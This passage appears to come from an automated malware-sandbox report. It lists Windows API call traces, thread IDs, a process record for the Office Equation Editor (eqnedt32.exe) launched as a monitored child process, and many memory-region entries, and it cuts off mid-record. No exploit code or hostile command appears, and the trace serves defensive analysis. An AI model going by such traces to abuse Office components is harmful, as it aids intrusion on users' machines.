[204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0120.949] CoGetContextToken (in: pToken=0x1eec84 | out: pToken=0x1eec84) returned 0x0 [0121.034] CObjectContext::QueryInterface () returned 0x0 [0121.034] CObjectContext::GetCurrentThreadType () returned 0x0 [0121.034] Release () returned 0x0 [0121.036] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x3ef490*=0xac, lpdwindex=0x1eeb34 | out: lpdwindex=0x1eeb34) returned 0x0 Thread: id = 29 os_tid = 0xe54 Thread: id = 30 os_tid = 0xe58 [0076.822] CoGetContextToken (in: pToken=0xdcf7ec | out: pToken=0xdcf7ec) returned 0x800401f0 [0076.822] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0121.094] SetWindowLongW (hWnd=0x10348, nIndex=-4, dwNewLong=2005870045) returned 17369342 [0121.096] SetClassLongW (hWnd=0x10348, nIndex=-24, dwNewLong=2005870045) returned 0x10908d6 [0121.096] PostMessageW (hWnd=0x10348, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0121.098] GetModuleHandleW (lpModuleName=0x0) returned 0x1250000 [0121.099] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", hInstance=0x1250000) returned 0 [0121.099] EtwEventUnregister () returned 0x0 [0121.132] GdipDisposeImage (image=0x52d2230) returned 0x0 [0121.177] CloseHandle (hObject=0x40) returned 1 [0121.253] RegCloseKey (hKey=0x80000004) returned 0x0 Thread: id = 31 os_tid = 0xe5c Thread: id = 90 os_tid = 0xe9c Thread: id = 91 os_tid = 0xea0 Thread: id = 92 os_tid = 0xebc Thread: id = 94 os_tid = 0xec8 Thread: id = 95 os_tid = 0xecc Process: id = "4" image_name = "eqnedt32.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x3a2e3000" os_pid = "0xe30" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xd1c" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\eqnedt32.exe\" -Embedding" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 742 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 743 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 744 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 745 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 746 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 747 start_va = 0x400000 end_va = 0x48dfff monitored = 0 entry_point = 0x44cd40 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\eqnedt32.exe" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 748 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 749 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 750 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 751 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 752 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 753 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 754 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 755 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 756 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 758 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 759 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 760 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 761 start_va = 0x290000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 762 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 763 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 764 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 765 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 766 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 767 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 768 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 769 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 770 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 771 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 772 start_va = 0x4a0000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 773 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 774 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 775 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 776 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 777 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 778 start_va = 0x1c0000 end_va = 0x226fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 779 start_va = 0x729b0000 end_va = 0x72b64fff monitored = 0 entry_point = 0x72aa3d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 780 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 781 start_va = 0x72940000 end_va = 0x729a4fff monitored = 0 entry_point = 0x7295fa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 782 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 783 start_va = 0x72870000 end_va = 0x7293afff monitored = 0 entry_point = 0x72886a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 784 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 785 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 786 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 787 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 788 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 789 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 790 start_va = 0x763d0000 end_va = 0x7652bfff monitored = 0 entry_point = 0x7641ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 791 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 792 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 793 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 794 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 795 start_va = 0x755b0000 end_va = 0x761f9fff monitored = 0 entry_point = 0x75631601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 796 start_va = 0x76850000 end_va = 0x768a6fff monitored = 0 entry_point = 0x76869ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 797 start_va = 0x72850000 end_va = 0x72866fff monitored = 0 entry_point = 0x72851c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 798 start_va = 0x744c0000 end_va = 0x744cafff monitored = 0 entry_point = 0x744c1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 799 start_va = 0x75230000 end_va = 0x752b3fff monitored = 0 entry_point = 0x752319a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 800 start_va = 0x230000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 801 start_va = 0x230000 end_va = 0x24dfff monitored = 0 entry_point = 0x24158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 802 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 803 start_va = 0x670000 end_va = 0x7f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 804 start_va = 0x230000 end_va = 0x24dfff monitored = 0 entry_point = 0x24158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 805 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 806 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 808 start_va = 0x230000 end_va = 0x230fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 809 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 810 start_va = 0x800000 end_va = 0x980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 811 start_va = 0x990000 end_va = 0x1d8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 812 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 813 start_va = 0x1d90000 end_va = 0x205efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 814 start_va = 0x260000 end_va = 0x260fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 815 start_va = 0x270000 end_va = 0x276fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 816 start_va = 0x260000 end_va = 0x260fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 817 start_va = 0x270000 end_va = 0x276fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 818 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 821 start_va = 0x270000 end_va = 0x27dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 822 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 824 start_va = 0x76ad0000 end_va = 0x76b5efff monitored = 0 entry_point = 0x76ad3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 825 start_va = 0x2060000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 826 start_va = 0x2060000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 827 start_va = 0x21e0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 828 start_va = 0x21f0000 end_va = 0x25effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 829 start_va = 0x72f00000 end_va = 0x7313ffff monitored = 0 entry_point = 0x72f066bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 830 start_va = 0x3de20000 end_va = 0x3de2dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 831 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 833 start_va = 0x270000 end_va = 0x270fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 834 start_va = 0x310000 end_va = 0x3eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 835 start_va = 0x27e0000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 836 start_va = 0x76530000 end_va = 0x765b2fff monitored = 0 entry_point = 0x765323d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 837 start_va = 0x4a0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 838 start_va = 0x4e0000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 839 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 840 start_va = 0x2060000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 841 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 842 start_va = 0x25f0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 843 start_va = 0x74190000 end_va = 0x741a6fff monitored = 0 entry_point = 0x74193573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 844 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 845 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 846 start_va = 0x74150000 end_va = 0x7418afff monitored = 0 entry_point = 0x7415128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 847 start_va = 0x742c0000 end_va = 0x742cdfff monitored = 0 entry_point = 0x742c1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 848 start_va = 0x520000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 849 start_va = 0x2180000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 850 start_va = 0x26f0000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 851 start_va = 0x2820000 end_va = 0x291ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 852 start_va = 0x2920000 end_va = 0x2a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 853 start_va = 0x2a20000 end_va = 0x2adffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 854 start_va = 0x2c40000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 855 start_va = 0x7efaa000 end_va = 